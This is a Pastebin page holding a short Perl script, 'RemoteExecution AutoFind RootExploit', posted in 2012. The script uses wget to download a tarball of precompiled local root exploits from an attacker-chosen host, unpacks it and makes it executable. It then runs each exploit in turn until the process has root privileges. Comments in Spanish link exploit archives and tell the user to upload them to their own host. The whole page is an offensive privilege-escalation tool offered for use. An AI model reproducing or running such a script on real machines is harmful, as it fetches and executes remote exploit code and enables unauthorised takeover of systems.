Advertisement
hielasangre

[ #RemoteExecution AutoFind RootExploit ]

Dec 31st, 2012
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.31 KB | None | 0 0
  1. #!/usr/bin/perl
  2. #Code By: Daniel Godoy AKA hielasangre
  3. #RootExploits Compilados: http://localroot.th3-0utl4ws.com/
  4. #RootExploits Compilados: http://www.mediafire.com/?0m104ljazc6tcob
  5. #Bajarlos y subirlo a un host de preferencia y donde dice $URL completarlo segun corresponda.
  6. #Greetz: CaldenTech Staff & Sunplace.
  7. system('clear');
  8. $dir = "rootexploits/";
  9. $url = "http://www.example.com/";
  10. system('wget '.$url.'rootexploits.tar.gz');
  11. system('tar -xvzf rootexploits.tar.gz');
  12. system('chmod +x -R '.$dir);
  13. print "[ #RemoteExecution AutoFind RootExploit ]\n \n";
  14. print "Kernel: ";
  15. system('uname -a');
  16. print "\n \nID: ";
  17. system('id');
  18. print "\n \n";
  19. opendir(DIR, "$dir");
  20. @FILES = readdir(DIR);
  21. foreach $file (@FILES)
  22.         {
  23.                 if ($< != 0)
  24.                         {
  25.                         if($file !="." || $file !="..")
  26.                                 {      
  27.                                 system($dir.$file);
  28.                                 print "Exploit Failed :( => ".$file." \n\n";
  29.                                 }
  30.                         }
  31.                         else
  32.                                 {
  33.                                 print "\n[!] Exploit Success! :D => ".$file."\n";
  34.                                 exit 1;
  35.                                 }
  36.         }
  37. closedir(DIR);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement